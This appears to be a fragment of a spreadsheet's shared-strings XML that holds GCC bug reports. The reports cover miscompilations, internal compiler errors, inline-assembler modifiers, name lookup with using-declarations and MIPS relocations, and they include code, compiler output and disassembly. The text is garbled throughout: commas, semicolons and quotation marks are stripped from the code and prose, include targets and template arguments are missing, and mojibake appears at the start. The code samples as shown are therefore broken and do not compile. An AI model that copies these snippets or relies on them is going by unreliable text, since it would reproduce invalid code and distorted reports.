error: no match for â€˜operator++â€™ (operand type is â€˜Aâ€™)
...
and the previous error disappears.
The errors are independent and there's no reason why both can't appear.</t>
  </si>
  <si>
    <t>GCC-8937</t>
  </si>
  <si>
    <t xml:space="preserve">
Release:
g++ 3.2.1
Environment:
Linux x86</t>
  </si>
  <si>
    <t>GCC-37621</t>
  </si>
  <si>
    <t>Missing documentation for x86 inline assembler modifiers</t>
  </si>
  <si>
    <t>I came across the following modifiers for inline assembler:
 asm (rorw $8  %w0 : =q (y) : 0 (x))
 asm (xchg %b0 %h0 : =q (y) : 0 (x))
They work very well. No bug in the compiler itself but I haven't found anything about them in the online documentation. 
Note: The %w0 %b0 and %h0 modifiers allows us to access thesub-registers of a 32 bit register. E.g. if %0 is EAX %w0 becomes AX %b0 becomes AL and %h0 becomes AH.</t>
  </si>
  <si>
    <t>n.pipenbrinck</t>
  </si>
  <si>
    <t>GCC-15908</t>
  </si>
  <si>
    <t>Invalid codegen: long long function</t>
  </si>
  <si>
    <t>The following fails on Darwin with -O2.   (analysis afterwards)
extern long long xx(int) __attribute__((noinline))
long long array[60]
int foo() {
  int i
  for (i=0 i&lt;60 i++)
    array[i] = xx(i)
}
long long xx(int i)
{
  return ((long long)i)&lt;&lt;32
}
int main() { 
    foo()
    if (array[7] != ((long long)7)&lt;&lt;32)
      abort()
}
Basic problem is that Darwin uses DImode Parallel for long long function returns which falls through 
the cracks in df.c:df_def_record_1().  I'm pretty sure the following patch is right for ppc but I'm not 
sure what non-BLKmode parallel is used for on other targets....
Index: df.c
===============================================================
====
RCS file: /cvs/gcc/gcc/gcc/df.cv
retrieving revision 1.32.2.16.2.3
diff -u -d -b -w -c -3 -p -r1.32.2.16.2.3 df.c
cvs diff: conflicting specifications of output style
*** df.c        7 Jun 2004 17:04:49 -0000       1.32.2.16.2.3
--- df.c        9 Jun 2004 23:53:17 -0000
*************** df_def_record_1 (struct df *df rtx x b
*** 888896 ****
      loc = 
    dst = *loc
!   /* Some targets place small structures in registers for
       return values of functions.  */
!   if (GET_CODE (dst) == PARALLEL &amp;&amp; GET_MODE (dst) == BLKmode)
      {
        int i
--- 888896 ----
      loc = 
    dst = *loc
!   /* Some targets place small structures or 64-bit ints in registers for
       return values of functions.  */
!   if (GET_CODE (dst) == PARALLEL)
      {
        int i</t>
  </si>
  <si>
    <t>GCC-37374</t>
  </si>
  <si>
    <t>using shadows declaration</t>
  </si>
  <si>
    <t>The following code (example A) compiles:
  namespace N1 { void f() {} }
  namespace N2 { void f(int) {} using N1::f }
  main() { N2::f(0) }
But this code does not compile (example B) because the compiler claims there is no f(int) within N2:
  namespace N1 { void f() {} }
  namespace N2 { void f(int) using N1::f }
  void N2::f(int) {}
  main() { N2::f(0) }
I do not have the C++ expertise to know whether the using N1::f should shadow the previous use of the unqualified name f inside N2 but I do think that it should be consistent for function declarations vs function definitions.  That is if using N1::f should shadow the prior use of f within N2 then example A should not compile because the N2::f with the (int) overload has been shadowed.  If using N1::f should not shadow the prior use of f within N2 then example B should compile because N2::f(int) was properly declared in namespace N2.
Example B used to compile in g++-4.1.2.  It was in upgrading to 4.3.0 that code in our tree that is like example B suddenly stopped compiling.
I apologize that I do not know what the bug is --- is g++ incorrectly allowing example A to compile or is it incorrectly giving an error with example B?   I do not know but it seems that one must be wrong.
Also I apologize in advance if gcc's behavior is correct here and somehow it is right that A should compile and B should not.  I find the rules around unqualified name resolution using and function overloading difficult to understand.  Any explanation greatly appreciated.
Whatever the result the workaround is easy of course --- just move the using N1::f before any other use of f within N2.  Then there is no question about what sorts of uses of f should be shadowed.
Thanks
    -Ken</t>
  </si>
  <si>
    <t>kduda</t>
  </si>
  <si>
    <t>GCC-5017</t>
  </si>
  <si>
    <t>i386 floating point optimization</t>
  </si>
  <si>
    <t>The included small test program fails when compiled with
gcc -O3 -o mybes mybes.c -lm
It works with -O0.
indication of failure is the following output.
The first line starting with 5.00 is garbage.
There should not be any nan
4.00  18      4.0944813915730677499e-11          11.301921952136330496
4.00  19      4.3099804121821765789e-12          11.301921952136330496
4.00  20      4.3099804121821765788e-13          11.301921952136330496
4.00  21      4.1047432496973110274e-14          11.301921952136330496
4.00  22      3.7315847724521009341e-15          11.301921952136330496
4 11.301921952136330773 6.62406158447265625
5.00   1                            nan                              1
5.00   2                            nan                            nan
5.00   3                            nan                            nan
5.00   4                            nan                            nan
5.00   5                            nan                            nan
Release:
3.0.2
Environment:
System: Linux lp27 2.4.4-4GB #1 Wed May 16 00:37:55 GMT 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../configure
How-To-Repeat:
#include 
double
mybesi0 (double x)
{
  int k = 0
  long double sum = 0
  long double add = 1
  long double x2 = x / 2.
  if (x == 0)
    return 1
  if (x &lt; 0)
    x = -x
  if (x &gt; 50)
    {
      fprintf (stderr argument to mybesi0 too large:%g\n x)
      exit (1)
    }
  add = 1
  for ()
    {
      sum += add * add
      add /= (++k)
      add *= x2
      printf(%4.2f %3d %30.20Lg %30.20Lg\nxkaddsum)
      if (add / sum &lt; 1e-15)
	break
    }
  return sum
}
float
bessi0 (float x)
{
  float ax ans
  double y
  if ((ax = fabs (x)) &lt; 3.75)
    {
      y = x / 3.75
      y *= y
      ans = 1.0 + y * (3.5156229 + y * (3.0899424 + y * (1.2067492
		  + y * (0.2659732 + y * (0.360768e-1 + y * 0.45813e-2)))))
    }
  else
    {
      y = 3.75 / ax
      ans = (exp (ax) / sqrt (ax)) * (0.39894228 + y * (0.1328592e-1
		   + y * (0.225319e-2 + y * (-0.157565e-2 + y * (0.916281e-2
	       + y * (-0.2057706e-1 + y * (0.2635537e-1 + y * (-0.1647633e-1
						  + y * 0.392377e-2))))))))
    }
  return ans
}
void
main (void)
{
  double x
  for (x = 0 x &lt;= 50 x += 1)
   printf (%.20g %.20g %.20g\n x mybesi0 (x) bessi0(x)) 
}</t>
  </si>
  <si>
    <t>ghh</t>
  </si>
  <si>
    <t>GCC-11962</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] ICE in type_dependent_expression on omitted second operand to ?: in template argument expression</t>
  </si>
  <si>
    <t>Since omitting the second operand in a conditional expression is a generally
working GNU extension to the language I would expect it to work in a template
argument expresion too:
template class c
template int test(c
void test(c*c2) {
	test(*c2)
}</t>
  </si>
  <si>
    <t>GCC-66916</t>
  </si>
  <si>
    <t>[6 Regression] FAIL: gcc.target/arm/pr43920-2.c object-size text &lt;= 54</t>
  </si>
  <si>
    <t>Created attachment 36006
Failing assembly
After this commit I'm seeing the test fail on arm targets:
Author: rguenth 
Date:   Thu Jul 16 08:28:51 2015 +0000
    2015-07-16  Richard Biener  
    	* fold-const.c (fold_widened_comparison): Remove.
    	(fold_sign_changed_comparison): Likewise.
    	(fold_comparison): Move widened and sign-changed comparison
    	simplification ...
    	* match.pd: ... to patterns here.
    	* generic-match-head.c: Include target.h.
    	* gimple-match-head.c: Likewise.
    	* gcc.dg/tree-ssa/pr21031.c: Adjust.
    git-svn-id: svn+ssh://gcc.gnu.org/svn/gcc/trunk@225861 138bc75d-0d04-0410-961f-82ee72b054a4
a sub+cmp sequence is not merged into a subs causing the code size regression</t>
  </si>
  <si>
    <t>GCC-30780</t>
  </si>
  <si>
    <t>FPE in CPU_TIME (and possibly others) with -ffpe-trap=underflow</t>
  </si>
  <si>
    <t>Test2.f95 has this code:
program test2
 real :: start finish dog
 call cpu_time(start)
 dog = 1.0
 dog = dog*dog
 call cpu_time(finish)
 print '(Time =  f6.3  seconds. )' finish - start
end program test2      
I compiled it with:
gfortran -O0 -ffpe-trap='precision' test2.f95
and on running got this error:
Floating point exception</t>
  </si>
  <si>
    <t>glv</t>
  </si>
  <si>
    <t>GCC-64722</t>
  </si>
  <si>
    <t>On 2nd time libgccjit is run in-process on i686 generated code clobbers %ebx register</t>
  </si>
  <si>
    <t>I'm seeing a crash on i686 for various test cases each
within main getting ready to begin the *3rd* iteration of the test.
  FAIL: test-array-as-pointer.c.exe killed: 37097 exp8 0 0 CHILDKILLED SIGSEGV {segmentation violation}
  FAIL: test-calling-external-function.c.exe killed: 37185 exp8 0 0 CHILDKILLED SIGSEGV {segmentation violation}
  FAIL: test-combination.c.exe killed: 37273 exp8 0 0 CHILDKILLED SIGSEGV {segmentation violation}
  FAIL: test-expressions.c.exe killed: 38499 exp8 0 0 CHILDKILLED SIGSEGV {segmentation violation}
  FAIL: test-fibonacci.c.exe killed: 38587 exp8 0 0 CHILDKILLED SIGSEGV {segmentation violation}
  FAIL: test-functions.c.exe killed: 38627 exp8 0 0 CHILDKILLED SIGSEGV {segmentation violation}
  FAIL: test-hello-world.c.exe killed: 38695 exp8 0 0 CHILDKILLED SIGSEGV {segmentation violation}
  FAIL: test-nested-contexts.c.exe killed: 38831 exp8 0 0 CHILDKILLED SIGSEGV {segmentation violation}
  FAIL: test-operator-overloading.cc.exe killed: 38919 exp8 0 0 CHILDKILLED SIGSEGV {segmentation violation}
  FAIL: test-quadratic.c.exe killed: 38959 exp8 0 0 CHILDKILLED SIGSEGV {segmentation violation}
  FAIL: test-quadratic.cc.exe killed: 39000 exp8 0 0 CHILDKILLED SIGSEGV {segmentation violation}
  FAIL: test-reading-struct.c.exe killed: 39040 exp8 0 0 CHILDKILLED SIGSEGV {segmentation violation}
  FAIL: test-threads.c.exe killed: 39176 exp8 0 0 CHILDKILLED SIGSEGV {segmentation violation}
All of them crash here in main trying to read argv apparently something has trashed %ebx:
(gdb) disassemble main
Dump of assembler code for function main:
   0x080499c0 :	lea    0x4(%esp)%ecx
   0x080499c4 :	and    $0xfffffff0%esp
   0x080499c7 :	pushl  -0x4(%ecx)
   0x080499ca :	push   %ebp
   0x080499cb :	mov    %esp%ebp
   0x080499cd :	push   %ebx
   0x080499ce :	push   %ecx
   0x080499cf :	sub    $0x10%esp
   0x080499d2 :	mov    %ecx%ebx
   0x080499d4 :	movl   $0x1-0xc(%ebp)
   0x080499db :	jmp    0x8049a25 
=&gt; 0x080499dd :	mov    0x4(%ebx)%eax
   0x080499e0 :	mov    (%eax)%eax
   0x080499e2 :	sub    $0xc%esp
   0x080499e5 :	push   %eax
   0x080499e6 :	call   0x8049982 
   0x080499eb :	add    $0x10%esp
   0x080499ee :	sub    $0x8%esp
   0x080499f1 :	push   $0x5
   0x080499f3 :	pushl  -0xc(%ebp)
   0x080499f6 :	push   %eax
   0x080499f7 :	push   $0x804a06b
   0x080499fc :	push   $0x400
   0x08049a01 :	push   $0x804c340
   0x08049a06 :	call   0x8048fc0 
   0x08049a0b :	add    $0x20%esp
   0x08049a0e :	mov    0x4(%ebx)%eax
   0x08049a11 :	mov    (%eax)%eax
   0x08049a13 :	sub    $0x8%esp
   0x08049a16 :	push   $0x0
   0x08049a18 :	push   %eax
   0x08049a19 :	call   0x80498be 
   0x08049a1e :	add    $0x10%esp
   0x08049a21 :	addl   $0x1-0xc(%ebp)
   0x08049a25 :	cmpl   $0x5-0xc(%ebp)
   0x08049a29 :	jle    0x80499dd 
   0x08049a2b :	call   0x8049335 
   0x08049a30 :	mov    $0x0%eax
   0x08049a35 :	lea    -0x8(%ebp)%esp
   0x08049a38 :	pop    %ecx
   0x08049a39 :	pop    %ebx
   0x08049a3a :	pop    %ebp
   0x08049a3b :	lea    -0x4(%ecx)%esp
   0x08049a3e :	ret
End of assembler dump.
Investigating test-hello-world.c and the generated hello_world:
(gdb) break hello_world
On iteration 1:
(gdb) disassemble hello_world
Dump of assembler code for function hello_world:
   0xf671a510 :	push   %ebp
   0xf671a511 :	mov    %esp%ebp
   0xf671a513 :	push   %ebx
=&gt; 0xf671a514 :	sub    $0x4%esp
   0xf671a517 :	call   0xf671a53d 
   0xf671a51c :	add    $0x1ae4%eax
   0xf671a521 :	sub    $0x8%esp
   0xf671a524 :	pushl  0x8(%ebp)
   0xf671a527 :	lea    -0x1aa8(%eax)%edx
   0xf671a52d :	push   %edx
   0xf671a52e :	mov    %eax%ebx
   0xf671a530 :	call   0xf671a3b0 
   0xf671a535 :	add    $0x10%esp
   0xf671a538 :	mov    -0x4(%ebp)%ebx
   0xf671a53b :	leave  
   0xf671a53c :	ret    
End of assembler dump.
but on iteration 2:
(gdb) cont
ITERATION 2
Breakpoint 1 0xf671a516 in hello_world (name=0x804a35a world) from /tmp/libgccjit-9zApb1/fake.so
(gdb) disassemble 
Dump of assembler code for function hello_world:
   0xf671a510 :	push   %ebp
   0xf671a511 :	mov    %esp%ebp
   0xf671a513 :	sub    $0x8%esp
=&gt; 0xf671a516 :	call   0xf671a539 
   0xf671a51b :	add    $0x1ae5%eax
   0xf671a520 :	sub    $0x8%esp
   0xf671a523 :	pushl  0x8(%ebp)
   0xf671a526 :	lea    -0x1aac(%eax)%edx
   0xf671a52c :	push   %edx
   0xf671a52d :	mov    %eax%ebx
   0xf671a52f :	call   0xf671a3b0 
   0xf671a534 :	add    $0x10%esp
   0xf671a537 :	leave  
   0xf671a538 :	ret    
End of assembler dump.
If I'm reading this right iteration 1's generated hello_world saves and restores %ebx but iteration 2's version of it is clobbering %ebx.</t>
  </si>
  <si>
    <t>GCC-23435</t>
  </si>
  <si>
    <t>[4.1/4.2 Regression] Unrecognizable insn (in extract_insn at recog.c)</t>
  </si>
  <si>
    <t>I have the following error when compiling a file from linux kernel (attached).
Command line:
m68k-elf-gcc -w -O1 -c pr.c
Output:
pr.c: In function 'nfs_statfs':
pr.c:8757: error: unrecognizable insn:
(insn 42 40 43 3 (set (mem/s/j:DI (plus:SI (reg/f:SI 26 virtual-stack-vars)
                (const_int -64 [0xffffffc0])) [0 res.bsize+0 S8 A16])
        (zero_extend:DI (mem/s/j:SI (plus:SI (reg/v/f:SI 45 [ sb ])
                    (const_int 10 [0xa])) [0 .s_blocksize+0 S4 A16])))
-1 (nil)
    (nil))
pr.c:8757: internal compiler error: in extract_insn at recog.c:2084
Last working version:
2005-07-29 12:00:00 UTC</t>
  </si>
  <si>
    <t>GCC-79512</t>
  </si>
  <si>
    <t>[6 Regression] ICE: Segfault in gimple_build_call_1 at gimple.c:218</t>
  </si>
  <si>
    <t>Version 6/7 (on x86_64 GNU/Linux) with option -fopenmp-simd
ICEs for testsuite files ./g++.dg/gomp/target-teams-1.C
and ./g++.dg/gomp/teams-1.C. Last one reduced :
$ cat z1.cc
void
bar ()
{
  #pragma omp target
  #pragma omp teams
    {
      int i
      goto ok1
      for (i = 0 i &lt; 10 ++i)
        { ok1: break }
    }
}
$ gcc-7-20170212 -fopenmp -c z1.cc
$ gcc-7-20170212 -fopenmp-simd -c z1.cc
z1.cc: In function 'void bar()':
z1.cc:4:11: internal compiler error: Segmentation fault
   #pragma omp target
           ^~~
0xde341f crash_signal
        ../../gcc/toplev.c:333
0xb3456d gimple_build_call_1
        ../../gcc/gimple.c:218
0xb3456d gimple_build_call_vec(tree_node* vec)
        ../../gcc/gimple.c:235
0xcb6f33 expand_omp_target
        ../../gcc/omp-expand.c:7535
0xcc1ebc expand_omp
        ../../gcc/omp-expand.c:7938
0xcc42bd execute_expand_omp
        ../../gcc/omp-expand.c:8118</t>
  </si>
  <si>
    <t>GCC-1106</t>
  </si>
  <si>
    <t>Class.hashCode aborts</t>
  </si>
  <si>
    <t xml:space="preserve">State-Changed-From-To: open-&gt;closed
State-Changed-Why: FIXED by this patch:
    http://gcc.gnu.org/ml/gcc-patches/2000-06/msg00064.html
</t>
  </si>
  <si>
    <t>GCC-37076</t>
  </si>
  <si>
    <t>Concatenation of KIND=4 strings with KIND=4 parameters fails</t>
  </si>
  <si>
    <t>This program illustrates the problem.  I think this is a rejects valid.  At the point of failure in resolve.c one of the operands has kind=1 for some reason.
program test3
  integerparameter :: u = 4
  character(1u)parameter :: nen=char(int(z'5e74')u) !year
  character(25u) :: string
  string = u_2008//nen
  print * u_2008//nen ! Compiles OK
  print * u_2008//nen//u_8 ! Rejects this.
end program test3
$ gfc concat.f90 
concat.f90:7.10:
  print * u_2008//nen//u_8 ! Rejects this.
         1
Error: Operands of string concatenation operator at (1) are CHARACTER(1)/CHARACTER(4)</t>
  </si>
  <si>
    <t>GCC-40069</t>
  </si>
  <si>
    <t>AUTO_INC_DEC not defined correctly in rtl.h</t>
  </si>
  <si>
    <t>I noticed that AUTO_INC_DEC is defined a bit oddly in gcc/rtl.h. More specifically the condition does not include HAVE_POST_MODIFY_DISP but it does include HAVE_PRE_MODIFY_DISP twice. Most likely one of these HAVE_PRE_MODIFY_DISP should be a HAVE_POST_MODIFY_DISP.
The following is the code snippet from gcc/rtl.h that I am talking about:
/* Indicate whether the machine has any sort of auto increment addressing.
   If not we can avoid checking for REG_INC notes.  */
#if (defined (HAVE_PRE_INCREMENT) || defined (HAVE_PRE_DECREMENT) \
     || defined (HAVE_POST_INCREMENT) || defined (HAVE_POST_DECREMENT) \
     || defined (HAVE_PRE_MODIFY_DISP) || defined (HAVE_PRE_MODIFY_DISP) \
     || defined (HAVE_PRE_MODIFY_REG) || defined (HAVE_POST_MODIFY_REG))
#define AUTO_INC_DEC
#endif</t>
  </si>
  <si>
    <t>ehliar</t>
  </si>
  <si>
    <t>GCC-3800</t>
  </si>
  <si>
    <t>A value of const static class attribute cannot be used in STL</t>
  </si>
  <si>
    <t>When a value of static const unsigned class attribute is used in a call to STL function map::operator[] the resulting code doesn't use the value directly (although it is simple constant allowed to declare in class {}) and ld then can not find the value.
This is a problem of gcc 3.0 release &lt;= 2.95.2 compiles well.
Release:
gcc version 3.0
Environment:
OS Linux Intel platform
How-To-Repeat:
g++ map.cpp
-----------
map.cpp:
#include 
class MyClass {
public:
    static const unsigned attribute = 3
}
int main(int argc char *argv[]) {
    std::map myMap
    myMap[MyClass::attribute] = 5
    return 0
}</t>
  </si>
  <si>
    <t>krcmar</t>
  </si>
  <si>
    <t>GCC-877</t>
  </si>
  <si>
    <t>gcc 2.95.2 generates incorrect code on i386</t>
  </si>
  <si>
    <t>It seems that a variable length shift of a long long
is miscompiled. This causes Linux kernel bugs.
Release:
gcc 2.95.2
Environment:
ix86 with Linux or *BSD
How-To-Repeat:
gcc -Wall -O2 -o bug bug.c ./bug</t>
  </si>
  <si>
    <t>aeb</t>
  </si>
  <si>
    <t>GCC-54362</t>
  </si>
  <si>
    <t>COND_EXPR not understood by either alias or ITM</t>
  </si>
  <si>
    <t>Take this slightly modified  gcc.dg/tm/memopt-12.c :
/* { dg-do compile } */
/* { dg-options -fgnu-tm -O3 -fdump-tree-tmmark } */
extern int test(void) __attribute__((transaction_safe))
extern void *malloc (__SIZE_TYPE__) __attribute__((malloctransaction_safe))
struct large { int foo[500] }
int f(int j)
{
  int *p1 *p2 *p3
  p1 = malloc (sizeof (*p1)*5000)
  __transaction_atomic {
    _Bool t
    int i = 1
    *p1 = 0
    p2 = malloc (sizeof (*p2)*6000)
    *p2 = 1
    t = test()
    for (i = 0i &lt; ji++)
    {
    /* p3 = PHI (p1 p2) */
    if (t)
      p3 = p1
    else
      p3 = p2
    /* Since both p1 and p2 are thread-private we can inherit the
       logging already done.  No ITM_W* instrumentation necessary.  */
    *p3 = 555
    }
  }
  return p3[something()]
}
/* { dg-final { scan-tree-dump-times ITM_WU 0 tmmark } } */
/* { dg-final { cleanup-tree-dump tmmark } } */
--- CUT ---
It currently fails because the aliasing code does not understand that p3 cannot alias only local memory.
I found this while adding support to phiopt to convert some phi's into COND_EXPR.</t>
  </si>
  <si>
    <t>GCC-69566</t>
  </si>
  <si>
    <t>[OOP] Failure of SELECT TYPE with unlimited polymorphic function result</t>
  </si>
  <si>
    <t>Follow-up to PR 64578 comment 18:
  print * associated(return_pointer()) ! ICE
contains
  function return_pointer()
    class(*) pointer :: return_pointer(:)
  end function 
end
ICEs with trunk but not with gfortran-5:
internal compiler error: Speicherzugriffsfehler
0xa7a0ef crash_signal
	/home/janus/gcc/trunk/gcc/toplev.c:335
0x6b6f4f gfc_conv_procedure_call(gfc_se* gfc_symbol* gfc_actual_arglist* gfc_expr* vec*)
	/home/janus/gcc/trunk/gcc/fortran/trans-expr.c:4727
0x6b82b4 gfc_conv_function_expr
	/home/janus/gcc/trunk/gcc/fortran/trans-expr.c:6554
0x6c25d5 gfc_conv_associated
	/home/janus/gcc/trunk/gcc/fortran/trans-intrinsic.c:6662
0x6d55c9 gfc_conv_intrinsic_function(gfc_se* gfc_expr*)
	/home/janus/gcc/trunk/gcc/fortran/trans-intrinsic.c:7810
0x6b8248 gfc_conv_function_expr
	/home/janus/gcc/trunk/gcc/fortran/trans-expr.c:6530
0x6be2c5 gfc_conv_expr_reference(gfc_se* gfc_expr*)
	/home/janus/gcc/trunk/gcc/fortran/trans-expr.c:7660
0x6dad31 gfc_trans_transfer(gfc_code*)
	/home/janus/gcc/trunk/gcc/fortran/trans-io.c:2382
0x687e37 trans_code
	/home/janus/gcc/trunk/gcc/fortran/trans.c:1888
0x6d88b7 build_dt
	/home/janus/gcc/trunk/gcc/fortran/trans-io.c:1909
0x687e57 trans_code
	/home/janus/gcc/trunk/gcc/fortran/trans.c:1860
0x6ac1ec gfc_generate_function_code(gfc_namespace*)
	/home/janus/gcc/trunk/gcc/fortran/trans-decl.c:6107
0x643110 translate_all_program_units
	/home/janus/gcc/trunk/gcc/fortran/parse.c:5612
0x643110 gfc_parse_file()
	/home/janus/gcc/trunk/gcc/fortran/parse.c:5818
0x685222 gfc_be_parse_file
	/home/janus/gcc/trunk/gcc/fortran/f95-lang.c:201
According to Diminique ... The change occurred between revisions r224160 (2015-06-05 compiles) and r224647 (2015-06-19 ICE).</t>
  </si>
  <si>
    <t>GCC-41031</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE in insert_value_copy_on_edge preventing bootstrap on sparc64 and s390x testcase on cris-elf</t>
  </si>
  <si>
    <t>With revision 150591 cris-elf built.
From revision 150593 and on build is broken as follows compiling newlib:
...
/tmp/hpautotest-gcc1/cris-elf/gccobj/./gcc/xgcc -B/tmp/hpautotest-gcc1/cris-elf/gccobj/./gcc/ -nostdinc -B/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/v10/newlib/ -isystem /tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/v10/newlib/targ-include -isystem /tmp/hpautotest-gcc1/gcc/newlib/libc/include -B/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/v10/libgloss/cris -L/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/v10/libgloss/libnosys -L/tmp/hpautotest-gcc1/gcc/libgloss/cris -B/tmp/hpautotest-gcc1/cris-elf/pre/cris-elf/bin/ -B/tmp/hpautotest-gcc1/cris-elf/pre/cris-elf/lib/ -isystem /tmp/hpautotest-gcc1/cris-elf/pre/cris-elf/include -isystem /tmp/hpautotest-gcc1/cris-elf/pre/cris-elf/sys-include  -march=v10 -mbest-lib-options -DPACKAGE_NAME=\newlib\ -DPACKAGE_TARNAME=\newlib\ -DPACKAGE_VERSION=\1.17.0\ -DPACKAGE_STRING=\newlib\ 1.17.0\ -DPACKAGE_BUGREPORT=\\  -I. -I/tmp/hpautotest-gcc1/gcc/newlib/libc/stdlib -O2 -DHAVE_RENAME -D_USE_WRITE -DCOMPACT_CTYPE -fno-builtin      -g -O2  -march=v10 -mbest-lib-options -c -o lib_a-ecvtbuf.o `test -f 'ecvtbuf.c' || echo '/tmp/hpautotest-gcc1/gcc/newlib/libc/stdlib/'`ecvtbuf.c
/tmp/hpautotest-gcc1/gcc/newlib/libc/stdlib/ecvtbuf.c: In function 'print_e':
/tmp/hpautotest-gcc1/gcc/newlib/libc/stdlib/ecvtbuf.c:146:1: internal compiler error: in insert_value_copy_on_edge at tree-outof-ssa.c:223
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[8]: *** [lib_a-ecvtbuf.o] Error 1
make[8]: Leaving directory `/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/v10/newlib/libc/stdlib'
Author of patches in suspect revision range CC:ed.
Will attach preprocessed source.</t>
  </si>
  <si>
    <t>GCC-83858</t>
  </si>
  <si>
    <t>[8 Regression] error: invalid cast from type 'poly_uint16' to type 'long long int'</t>
  </si>
  <si>
    <t>Created attachment 43137
Preprocessed source
In stage1 the following error occurs:
g++ -std=gnu++98 -fno-PIE -c   -g -DIN_GCC     -fno-exceptions -fno-rtti -fasync
hronous-unwind-tables -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wno-f
ormat -Wmissing-format-attribute -Woverloaded-virtual -pedantic -Wno-long-long -
Wno-variadic-macros -Wno-overlength-strings -fno-common  -DHAVE_CONFIG_H -I. -I.
 -I../../gcc/gcc -I../../gcc/gcc/. -I../../gcc/gcc/../include -I../../gcc/gcc/..
/libcpp/include -I/opt/gnu/gcc/gmp/include  -I../../gcc/gcc/../libdecnumber -I..
/../gcc/gcc/../libdecnumber/dpd -I../libdecnumber -I../../gcc/gcc/../libbacktrac
e   -o varasm.o -MT varasm.o -MMD -MP -MF ./.deps/varasm.TPo ../../gcc/gcc/varas
m.c
In file included from ./tm.h:19:0
                 from ../../gcc/gcc/backend.h:28
                 from ../../gcc/gcc/varasm.c:31:
../../gcc/gcc/varasm.c: In function 'void assemble_start_function(tree const char*)':
../../gcc/gcc/config/pa/pa.h:601:43: error: invalid cast from type 'poly_uint16 {aka poly_int}' to type 'long long int'
      ? (HOST_WIDE_INT) GET_MODE_SIZE (MODE) \
                                           ^
../../gcc/gcc/config/pa/som.h:139:10: note: in expansion of macro 'FUNCTION_ARG_SIZE'
          FUNCTION_ARG_SIZE (TYPE_MODE (DECL_ARG_TYPE (parm))\
          ^~~~~~~~~~~~~~~~~
../../gcc/gcc/varasm.c:1880:3: note: in expansion of macro 'ASM_DECLARE_FUNCTION_NAME'
   ASM_DECLARE_FUNCTION_NAME (asm_out_file fnname current_function_decl)
   ^~~~~~~~~~~~~~~~~~~~~~~~~
Makefile:1110: recipe for target 'varasm.o' failed
make[3]: *** [varasm.o] Error 1
Even if I eliminate the cast from
#define FUNCTION_ARG_SIZE(MODE TYPE)   \
  ((((MODE) != BLKmode \
     ? (HOST_WIDE_INT) GET_MODE_SIZE (MODE) \
     : int_size_in_bytes (TYPE)) + UNITS_PER_WORD - 1) / UNITS_PER_WORD)
There is no 'operator/' for the poly_int.
Problem doesn't affect 64-bit hpux and linux.</t>
  </si>
  <si>
    <t>GCC-33169</t>
  </si>
  <si>
    <t>Compiler generates two different relocs for the same symbol</t>
  </si>
  <si>
    <t>The compiler generates two different relocs for the same function call which causes the linker to get confused.
----- Input -----
#include pthread.h
#include 
#include 
typedef __gnu_cxx::__pool_alloc &gt; myalloc
int main() {
  std::map myalloc&gt; y
  pthread_mutex_lock(0)
}
-----------------
build with:
  mipsel-linux-g++ -Os -fno-inline -c foo.cc
(No command line flags are required they don't appear to make a difference but the examples here will reflect those above.)
In this code chunk pthread_mutex_lock is called from two places.  The first is from inside the allocator the second is directly in main.  From the allocator a R_MIPS_GOT16/R_MIPS_LO16 reloc is generated.  From main() a R_MIPS_CALL16 reloc is generated.
0000001c :
  1c:   3c1c0000        lui     gp0x0
                        1c: R_MIPS_HI16 _gp_disp
  20:   279c0000        addiu   gpgp0
                        20: R_MIPS_LO16 _gp_disp
  24:   0399e021        addu    gpgpt9
  28:   27bdffe0        addiu   spsp-32
  2c:   afbf001c        sw      ra28(sp)
  30:   afb00018        sw      s024(sp)
  34:   afbc0010        sw      gp16(sp)
  38:   8f990000        lw      t90(gp)
                        38: R_MIPS_GOT16        .text
  3c:   27390000        addiu   t9t90
                        3c: R_MIPS_LO16 .text
  40:   0320f809        jalr    t9
  44:   00808021        move    s0a0
  48:   10400008        beqz    v06c &lt;__gthread_mutex_lock(pthread_mutex_t*)+0x
50&gt;
  4c:   8fbc0010        lw      gp16(sp)
  50:   8f990000        lw      t90(gp)
                        50: R_MIPS_GOT16        pthread_mutex_lock
  54:   02002021        move    a0s0
  58:   8fbf001c        lw      ra28(sp)
  5c:   8fb00018        lw      s024(sp)
  60:   27390000        addiu   t9t90
                        60: R_MIPS_LO16 pthread_mutex_lock
  64:   03200008        jr      t9
  68:   27bd0020        addiu   spsp32
  6c:   8fbf001c        lw      ra28(sp)
  70:   8fb00018        lw      s024(sp)
  74:   03e00008        jr      ra
  78:   27bd0020        addiu   spsp32
000000dc :
  dc:   3c1c0000        lui     gp0x0
                        dc: R_MIPS_HI16 _gp_disp
  e0:   279c0000        addiu   gpgp0
                        e0: R_MIPS_LO16 _gp_disp
  e4:   0399e021        addu    gpgpt9
  e8:   27bdffc8        addiu   spsp-56
  ec:   afbf0034        sw      ra52(sp)
  f0:   afb00030        sw      s048(sp)
  f4:   afbc0010        sw      gp16(sp)
  f8:   8f990000        lw      t90(gp)
                        f8: R_MIPS_CALL16       std::map&lt;int int std::less&lt;int
&gt; __gnu_cxx::__pool_alloc &gt; &gt;::map()
  fc:   27b00018        addiu   s0sp24
 100:   0320f809        jalr    t9
 104:   02002021        move    a0s0
 108:   8fbc0010        lw      gp16(sp)
 10c:   8f990000        lw      t90(gp)
                        10c: R_MIPS_CALL16      pthread_mutex_lock
 110:   0320f809        jalr    t9
 114:   00002021        move    a0zero
 118:   8fbc0010        lw      gp16(sp)
 11c:   8f990000        lw      t90(gp)
                        11c: R_MIPS_CALL16      std::map&lt;int int std::less&lt;int
&gt; __gnu_cxx::__pool_alloc &gt; &gt;::~map()
 120:   0320f809        jalr    t9
 124:   02002021        move    a0s0
 128:   8fbc0010        lw      gp16(sp)
 12c:   8fbf0034        lw      ra52(sp)
 130:   8fb00030        lw      s048(sp)
 134:   00001021        move    v0zero
 138:   03e00008        jr      ra
 13c:   27bd0038        addiu   spsp56
